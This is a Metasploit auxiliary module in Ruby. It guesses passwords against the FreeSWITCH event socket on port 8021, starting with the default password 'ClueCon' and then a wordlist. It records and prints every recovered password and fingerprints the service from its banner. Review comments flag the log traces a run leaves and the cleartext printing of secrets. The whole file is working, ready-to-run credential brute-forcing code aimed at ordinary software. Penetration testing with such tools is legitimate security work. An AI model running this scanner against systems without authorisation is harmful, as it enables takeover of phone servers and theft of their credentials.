Path: blob/master/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb
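##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/freeswitch_event_socket'

# Auxiliary scanner that tries passwords against the FreeSWITCH event socket
# (default port 8021) and records the outcome of every attempt.
#
# The service is authenticated by a password only, so every username-related
# AuthBrute option is deregistered in #initialize.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  prepend Msf::Exploit::Remote::AutoCheck

  # Declares the module metadata and its options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FreeSWITCH Event Socket Login',
        'Description' => %q{
          This module tests FreeSWITCH Event Socket logins on a range of
          machines and report successful attempts.
        },
        'Author' => [
          'krastanoel'
        ],
        'References' => [
          ['URL', 'https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket']
        ],
        'DefaultOptions' => { 'VERBOSE' => false },
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SERVICE_RESTARTS],
          'Reliability' => [],
          # NOTE(review): repeated failed logins presumably show up in the
          # target's FreeSWITCH logs; if so, IOC_IN_LOGS belongs here so that
          # operators and defenders know what trace a run leaves. Confirm.
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8021),
        # 'ClueCon' is described below as the event socket's default password;
        # a deployment that still accepts it has never rotated that secret.
        OptString.new('PASSWORD', [false, 'FreeSWITCH event socket default password', 'ClueCon']),
        OptPath.new('PASS_FILE',
                    [
                      false,
                      'The file that contains a list of of probable passwords.',
                      File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
                    ])
      ]
    )

    # freeswitch does not have an username, there's only password
    deregister_options(
      'DB_ALL_CREDS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING', 'BLANK_PASSWORDS',
      'USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE',
      'STOP_ON_SUCCESS'
    )
  end

  # Runs the password scan against one host and reports each result.
  #
  # Successful passwords are recorded through create_credential and
  # create_credential_login; failed ones go through invalidate_login.
  #
  # @param ip [String] address of the host being scanned
  def run_host(ip)
    cred_collection = Metasploit::Framework::PrivateCredentialCollection.new(
      password: datastore['PASSWORD'],
      pass_file: datastore['PASS_FILE']
    )
    cred_collection = prepend_db_passwords(cred_collection)

    scanner = Metasploit::Framework::LoginScanner::FreeswitchEventSocket.new(
      configure_login_scanner(
        host: ip,
        port: rport,
        cred_details: cred_collection,
        stop_on_success: true, # this will have no effect due to the scanner behaviour when scanning without username
        connection_timeout: 10
      )
    )

    scanner.scan! do |result|
      credential_data = result.to_h
      credential_data.merge!(
        module_fullname: fullname,
        workspace_id: myworkspace_id
      )

      if result.success?
        credential_data.delete(:username) # This service uses no username
        credential_core = create_credential(credential_data)
        credential_data[:core] = credential_core
        create_credential_login(credential_data)

        # The recovered password is printed in clear text in both branches, so
        # console output and spool files from a run hold a live secret.
        if datastore['VERBOSE']
          vprint_good("Login Successful: #{result.credential.private} (#{result.status}: #{result.proof&.strip})")
        else
          print_good("Login Successful: #{result.credential.private}")
        end
      else
        invalidate_login(credential_data)
        vprint_error("LOGIN FAILED: #{result.credential.private} (#{result.status}: #{result.proof&.strip})")
      end
    end
  end

  # Fingerprints the service from the banner it sends on connect.
  #
  # @param _ip [String] unused; the connection uses the module's own target options
  # @return [Exploit::CheckCode] Safe when the banner shows the connection was
  #   refused (the module attributes this to the network ACL), Unknown when no
  #   auth/request prompt is seen, Appears otherwise
  def check_host(_ip)
    connect
    # sock.get may hand back nil when nothing arrives before the read times out
    # (NOTE(review): confirm against the socket API). Coercing to a String lets
    # a silent peer fall through to Unknown instead of raising NoMethodError
    # on nil.include?.
    banner = sock.get.to_s
    disconnect(sock)

    # Seeing this rejection means the service refused the source address
    # before asking for a password, which is the state an event socket should
    # be in for any network that has no business talking to it.
    if banner.include?('Access Denied, go away.') || banner.include?('text/rude-rejection')
      return Exploit::CheckCode::Safe('Access denied by network ACL')
    end

    unless banner.include?('Content-Type: auth/request')
      return Exploit::CheckCode::Unknown('Unable to determine the service fingerprint')
    end

    Exploit::CheckCode::Appears
  end
end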